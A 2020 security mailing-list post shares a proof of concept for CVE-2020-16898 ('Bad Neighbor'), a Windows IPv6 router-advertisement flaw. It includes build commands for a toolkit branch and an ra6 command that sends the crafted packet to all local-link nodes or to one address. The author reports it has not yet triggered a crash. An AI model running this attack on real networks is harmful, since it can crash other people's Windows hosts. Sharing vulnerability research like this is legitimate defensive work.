[ipv6hackers] CVE-2020-16898: "Bad Neighbor" (IPv6 SLAAC/RDNSS)
Fernando Gont
fgont at si6networks.com
Wed Oct 14 16:24:22 UTC 2020
Folks,
You may be aware about CVE-2020-16898. If not, now you are :-) :
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/cve-2020-16898-bad-neighbor/
I've produced PoC for the aforementioned vulnerability according to the
description on the McAfee site, but somehow I seem to fail to trigger
the "Blue Screen Of Death" when trying the attack against my local MS
Windows 10 installation.
FWIW, the packet I'm sending can be downloaded (pcap) here:
https://www.gont.com.ar/pcaps/bad-neighbor.pcap
The packet can be crafted with the ra6 tool of the SI6 toolkit present
in the "nd-opt-fuzzing" branch of the github repo
(https://github.com/fgont/ipv6toolkit). That is,
git clone https://github.com/fgont/ipv6toolkit.git
cd ipv6toolkit
git checkout nd-opt-fuzzing
sudo make install
And then run the ra6 tool as:
sudo ra6 -i INTERFACE --bad-neighbor -d ff02::1 -v -e
Note that this will target all nodes on the local-link for the INTERFACE
interface. You may set the "-d" option to a unicast address if you want
to target a single system.
I'll keep looking further into this issue and report back to the group
if I find anything.
If you do play with the tool and test the PoC, please do let me/us know.
Thanks!
Regards,
--
Fernando Gont
SI6 Networks
e-mail: fgont at si6networks.com
PGP Fingerprint: 6666 31C6 D484 63B2 8FB1 E3C4 AE25 0D55 1D4E 7492
More information about the Ipv6hackers
mailing list